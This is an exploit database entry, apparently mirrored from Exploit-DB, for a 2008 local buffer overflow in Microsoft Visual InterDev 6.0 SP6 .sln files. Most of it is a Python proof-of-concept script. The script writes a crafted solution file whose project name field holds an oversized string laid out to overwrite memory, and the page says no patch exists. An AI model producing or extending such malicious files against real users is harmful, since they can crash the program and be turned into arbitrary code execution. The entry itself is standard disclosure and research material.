Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow

vendor:

Visual InterDev 6.0 (SP6)

by:

shinnai

7.5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Visual InterDev 6.0 (SP6)

Affected Version From: Microsoft Visual InterDev 6.0 (SP6)

Affected Version To: Microsoft Visual InterDev 6.0 (SP6)

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Microsoft Visual InterDev 6.0 (SP6) “.sln” files Local Buffer Overflow

Execution of arbitrary code is possible, but it annoys me at the moment.

Mitigation:

Ensure that all user input is validated and sanitized before being used.

Source

Exploit-DB raw data:

#usage: exploit.py FileName

import sys

print "--------------------------------------------------------------------------------"
print ' [PoC 2] Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org\n"
print " Execution of arbitrary code is possible, but it annoys me at the moment :)"
print "--------------------------------------------------------------------------------"

buff      = "a" * 264 + "bbbb" + "c" * 256

try:
    sln_file = \
        'Microsoft Visual Studio Solution File, Format Version 1.00\n'+\
        'Project("{}") = "' + buff + '"\n'+\ 
        'EndProject\n'
    
    out_file = open(sys.argv[1] + ".sln",'w')
    out_file.write(sln_file)
    out_file.close()
    print "\nFILE CREATION COMPLETED!\n"
except:
    print " \n -------------------------------------"
    print "  Usage: exploit.py FileName"
    print " -------------------------------------"
    print "\nAN ERROR OCCURS DURING FILE CREATION!"

# milw0rm.com [2008-04-03]